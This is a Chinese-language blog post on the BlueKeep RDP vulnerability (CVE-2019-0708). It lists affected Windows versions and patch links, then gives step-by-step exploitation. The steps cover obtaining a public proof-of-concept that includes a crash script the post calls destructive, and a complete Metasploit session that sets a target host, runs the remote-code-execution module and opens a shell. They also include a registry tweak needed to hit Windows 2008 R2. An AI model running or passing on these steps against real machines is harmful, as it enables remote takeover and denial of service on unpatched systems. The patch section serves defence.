CVE-2019-0708远程桌面漏洞验证和利用

2020-03-17  本文已影响0人  JJJoeee

漏洞影响范围:

Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows XP SP3 x86
Windows XP Professional x64 Edition SP2
Windows XP Embedded SP3 x86
Windows Server 2003 SP2 x86
Windows Server 2003 x64 Edition SP2

微软补丁下载(不包括XP和2003):

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

Windows Server 2003 漏洞补丁系列下载地址

Windows Server 2003 32位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe
Windows Server 2003 64位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

Windows XP 漏洞补丁系列下载地址

Windows XP 32位系统:
http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe
Windows XP 64位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

国内漏洞编号(CNVD-2019-14264、CNNVD-201905-434)

使用python脚本复现

1.准备一台安装了python3的机器(win或linux都可以)

2.下载https://github.com/n1xbyte/CVE-2019-0708的相关文件
poc.py(验证漏洞是否存在)
crashpoc.sh(进行破坏性攻击)
python xx.py ipAddress 32or64(目标win是32位还是64位)

3.安装impacket、Structure扩展包
pip3 install impacket
pip3 install Structure

4.安装openssl

5.给以上两个python文件赋予权限并执行

使用metasploit复现

下载metasploit相关文件:
下载地址:https://github.com/rapid7/metasploit-framework
下载RDP依赖:metasploit-framework/lib/msf/core/exploit/rdp.rb
下载RDP扫描模块:metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
下载cve-0708扫描模块:metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
下载cve-0708利用模块:metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

攻击windows 7 SP1 复现CVE-2019-0708

msfconsole
msf5> reload_all
msf5> search cve_2019_0708_bluekeep_rce
msf5> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.7
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > shell
如果成功的话就会进入rhost的ms-dos,可以输入whoami、net user查看相关信息

攻击windows 2008 R2 SP1 复现CVE-2019-0708

需要修改注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam]值修改为0(系统默认为1)
在MSF下执行如下命令:
msf5 > search cve_2019_0708_bluekeep_rce
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.10
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

上一篇下一篇

猜你喜欢

热点阅读